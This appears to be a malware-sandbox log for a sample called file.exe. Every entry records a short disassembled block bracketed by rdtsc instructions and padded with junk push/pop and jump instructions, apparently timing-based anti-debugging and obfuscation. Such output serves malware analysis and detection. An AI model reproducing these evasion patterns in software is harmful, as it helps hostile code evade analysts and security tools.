Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F7B16 second address: 5F7B1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F7B1A second address: 5F7B6D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0084E2F64Ch 0x00000007 jmp 00007F0084E2F652h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop eax 0x0000000f jbe 00007F0084E2F68Fh 0x00000015 pushad 0x00000016 push edx 0x00000017 pop edx 0x00000018 jnl 00007F0084E2F646h 0x0000001e jnc 00007F0084E2F646h 0x00000024 popad 0x00000025 pushad 0x00000026 jmp 00007F0084E2F657h 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5FD6AC second address: 5FD6B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F0085357C16h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5FD9AA second address: 5FD9B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5FDC92 second address: 5FDCB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 jnc 00007F0085357C16h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 jmp 00007F0085357C23h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5FDF6E second address: 5FDF72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5FDF72 second address: 5FDF7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F0085357C16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5FE234 second address: 5FE238 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5FEE36 second address: 5FEE41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F0085357C16h 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 600AB0 second address: 600AB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 600AB6 second address: 600ACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 popad 0x00000008 jl 00007F0085357C38h 0x0000000e push ecx 0x0000000f pushad 0x00000010 popad 0x00000011 pop ecx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 606215 second address: 606219 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 606219 second address: 60623A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a jmp 00007F0085357C27h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55CF84 second address: 55CF8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55CF8A second address: 55CFD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0085357C1Dh 0x00000009 popad 0x0000000a je 00007F0085357C2Bh 0x00000010 push esi 0x00000011 pop esi 0x00000012 jmp 00007F0085357C23h 0x00000017 pushad 0x00000018 js 00007F0085357C16h 0x0000001e pushad 0x0000001f popad 0x00000020 pushad 0x00000021 popad 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F0085357C1Bh 0x0000002a jno 00007F0085357C16h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6092B9 second address: 6092ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0084E2F659h 0x00000007 jmp 00007F0084E2F651h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edi 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6092ED second address: 6092FF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c jng 00007F0085357C16h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6092FF second address: 60931C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F0084E2F654h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 609467 second address: 609471 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0085357C33h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 609471 second address: 6094AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0084E2F657h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0084E2F659h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6094AD second address: 6094B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6094B1 second address: 6094B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6094B5 second address: 6094BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6094BB second address: 6094C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 609A3C second address: 609A48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F0085357C16h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 609A48 second address: 609A4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 609A4E second address: 609A72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007F0085357C18h 0x0000000b popad 0x0000000c push ebx 0x0000000d jmp 00007F0085357C22h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 609A72 second address: 609A78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 609BCC second address: 609BD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 609BD3 second address: 609BFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F0084E2F646h 0x00000009 jmp 00007F0084E2F659h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 609BFC second address: 609C02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 609C02 second address: 609C06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 609D7F second address: 609D8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jo 00007F0085357C16h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 609D8D second address: 609D9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007F0084E2F648h 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 609D9A second address: 609D9F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 60FB66 second address: 60FB95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0084E2F653h 0x00000009 ja 00007F0084E2F646h 0x0000000f popad 0x00000010 jmp 00007F0084E2F64Dh 0x00000015 push eax 0x00000016 push edx 0x00000017 push edx 0x00000018 pop edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 60FCD8 second address: 60FCE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 60FCE2 second address: 60FCE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 60FCE8 second address: 60FCEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6103C5 second address: 6103EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a jmp 00007F0084E2F64Eh 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 js 00007F0084E2F64Eh 0x00000019 pushad 0x0000001a popad 0x0000001b jnp 00007F0084E2F646h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 610546 second address: 61054A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 61054A second address: 610565 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jg 00007F0084E2F646h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 pop eax 0x00000011 popad 0x00000012 push edi 0x00000013 pushad 0x00000014 popad 0x00000015 pop edi 0x00000016 popad 0x00000017 pushad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 610565 second address: 61056B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 61056B second address: 610577 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F0084E2F646h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 610577 second address: 610580 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 610580 second address: 610584 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 610584 second address: 61058E instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0085357C16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 610952 second address: 610961 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0084E2F646h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 60F712 second address: 60F72E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0085357C28h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 618E4E second address: 618E54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 61F642 second address: 61F646 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 61F646 second address: 61F67D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0084E2F653h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edi 0x0000000c pushad 0x0000000d jno 00007F0084E2F64Eh 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F0084E2F64Ah 0x0000001a push edx 0x0000001b pop edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 628D01 second address: 628D07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62AD66 second address: 62AD7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0084E2F64Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62AD7C second address: 62AD80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 640F1E second address: 640F26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 641047 second address: 641051 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F0085357C16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 641051 second address: 64107D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0084E2F64Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jng 00007F0084E2F65Bh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 64107D second address: 641089 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F0085357C16h 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6418D1 second address: 6418E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0084E2F64Ch 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 646753 second address: 646778 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F0085357C26h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007F0085357C16h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 646778 second address: 64677C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 64677C second address: 64678C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007F0085357C16h 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 567054 second address: 56705D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56705D second address: 567070 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0085357C1Dh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 567070 second address: 567077 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6462FC second address: 646328 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b pop eax 0x0000000c push edi 0x0000000d pop edi 0x0000000e popad 0x0000000f jmp 00007F0085357C28h 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 64646B second address: 64648C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jnp 00007F0084E2F646h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d jmp 00007F0084E2F650h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 64648C second address: 646490 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 651AE1 second address: 651B02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F0084E2F646h 0x0000000a jmp 00007F0084E2F655h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 651B02 second address: 651B2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jno 00007F0085357C1Eh 0x0000000b pushad 0x0000000c jmp 00007F0085357C22h 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 651B2B second address: 651B49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0084E2F650h 0x00000009 pop edx 0x0000000a pushad 0x0000000b jp 00007F0084E2F646h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 659C25 second address: 659C2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 65B3C2 second address: 65B419 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F0084E2F651h 0x0000000b popad 0x0000000c jmp 00007F0084E2F657h 0x00000011 jo 00007F0084E2F64Ch 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d push edi 0x0000001e pop edi 0x0000001f jmp 00007F0084E2F653h 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 65B419 second address: 65B41F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 65B41F second address: 65B423 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 65B423 second address: 65B433 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0085357C1Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 668F38 second address: 668F3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 668F3C second address: 668F4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pushad 0x00000008 pushad 0x00000009 jnl 00007F0085357C16h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 668F4D second address: 668F5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jo 00007F0084E2F646h 0x0000000c popad 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 66B9A8 second address: 66B9C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F0085357C1Ah 0x00000008 jl 00007F0085357C16h 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push esi 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 66B9C2 second address: 66B9D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0084E2F64Fh 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 682AA2 second address: 682AA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 682C36 second address: 682C3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 682D86 second address: 682D9A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0085357C1Dh 0x00000007 pushad 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6830D5 second address: 6830E8 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0084E2F646h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6830E8 second address: 6830ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 683391 second address: 683397 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 68386E second address: 683878 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0085357C16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 686B31 second address: 686B37 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 686B37 second address: 686B41 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0085357C32h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6893E6 second address: 6893F0 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0084E2F646h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 689A88 second address: 689AE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F0085357C16h 0x0000000a popad 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push ecx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 pop ecx 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 jmp 00007F0085357C1Dh 0x0000001e mov eax, dword ptr [eax] 0x00000020 pushad 0x00000021 pushad 0x00000022 jmp 00007F0085357C1Ah 0x00000027 jne 00007F0085357C16h 0x0000002d popad 0x0000002e push edi 0x0000002f jmp 00007F0085357C25h 0x00000034 pop edi 0x00000035 popad 0x00000036 mov dword ptr [esp+04h], eax 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 689AE5 second address: 689B01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0084E2F658h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 68AFFF second address: 68B003 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
